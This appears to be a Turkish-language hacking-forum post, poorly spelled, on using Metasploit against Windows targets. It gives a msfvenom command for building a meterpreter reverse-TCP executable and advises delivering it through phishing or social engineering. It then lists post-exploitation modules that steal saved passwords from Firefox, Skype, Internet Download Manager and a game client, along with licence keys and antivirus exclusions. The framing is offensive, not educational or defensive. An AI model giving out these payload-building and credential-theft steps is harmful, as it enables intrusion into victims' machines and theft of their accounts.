me.tasploitte tum modullar /stayjer asistan klubu

cewl

Kıdemli Üye
3 Haz 2017
2,861
0
26
Merdekansalam eleykum

arkadaslar ilk once onu soylemek isdiyormki ****s.ploit cok elverisli 1 proqramdir portlara brute force etme hedef sistemin ana ekran gorunr=tusun alma hedef sistemin yetkilerne sahib olmak icin kullanilan 1 aracdir bu arac icin payload karsi sisteme sizma icin 1 payload gerekir brute force haric , bu payloadlari eyer isdersenizse kalinin kendi uzerinde bulunan msfpc windows ip yazlarak ve yahudaaKod:
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=(sizin ip) LPORT= (sizin acik port) -f exe > /root/Desktopdeye ana ekrana kayd yapip bu payloadi ya phisingg yada muhendislikle karsi tarafa gondere bilirsiniz /
Kod:
 tehlukesizlik zencirnin en zayif halkasi insandir

0GLdjD.jpgevet arkadaslar zencirdeki zayif halka insandir eyer hangise sistmde insan amili varsa bir sistemin arkasinda insan duruyorsa o sistem tm guvenli diyildir. ve baska 1 sey sosial muhendislik bu asamaya gelmek icin ise bir sira tecrube ve arasdirmalar lazim mesela basdan anlatmaqa calisiyim hedefi kandirdin peki kandirdikdan sonra ne yapacaksin ? bilgi toplama bu dovrde google mukemmel 1 uyqulamadir baska baska link siteleri bulunmakdadir ve konudan uzaklasmayalum
kali linuksun uzerinde bir cok teset amacli uyqulamalar gelmisdir beef ****sploit dmitry ve baska baska amma kali linuks koruma amcali olsada onu tam ters kullanmak mumkundurKod:
 Tesir eks tesire beraberdir


Kod:
 https://i.hizliresim.com/Dy9ZlO.jpg

Kod:
 https://i.hizliresim.com/pG91oa.jpg

vee asagiya bir video ekleyeceyim peki videoda neler yapyorm ? ilk once olarak msfvenom ile payload yapip hedefe attim hedef payloada tikladiqinda bende otrum acildi peki otrum acildikdan sonra biz neler yapa biliriz ? asagida komutlar ve anlamlarin paylasacagim ve tam olarak kolaylik acisindan videodada modlu nasil ekleyeceyniz e yardim edecekdir4G84bA.jpgKod:
 run post/windows/gather/credentials/imail

imaili calisdirir


Kod:
 run post/windows/gather/credentials/idm

internet download managerden sifreleri cikarir


Kod:
      run post/windows/gather/credentials/imvu


Bu modül IMVU oyun istemcisinden hesap kullanıcı adı ve parolasını çıkarır ve onu yağma olarak saklar.


Kod:
 run post/windows/gather/enum_devices

kurulu aygıtların listesini alınKod:
  run post/windows/gather/enum_domain


Active Directory'deki tüm kullanılabilir alanları listele

Kod:
   run post/multi/gather/firefox_creds
dosyanı firefox'tan çalmak için çalıştırKod:
 run post/multi/gather/skype_enum
skypenin sifresin almaqKod:
  post / windows / gather / enum_ms_product_keys
lisans anahtarlarını çalmak


Kod:
  run post/windows/gather/enum_db
yuklu veri tabanlari
Kod:
 post / windows / gather / enum_av_excluded
antivirüs istisnalarını programa götürmek geçiş ve otomatik geçiş yapmakKod:
  post / windows / manage / inject_cafitcha sertifikanızı uygulamaya ve SSL trafiğini çözmek için özel ve genel bir anahtara sahip olmanızı sağlar.


ve sayr vaktim oldukca konuya ekleyeceyim insallah :)

NOgbVk.jpg
vJ8ozD.png

cewl iyi seyirler diler


[ame="https://www.youtube.com/watch?v=4kvX_bgXuOg"]https://www.youtube.com/watch?v=4kvX_bgXuOg[/ame]
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.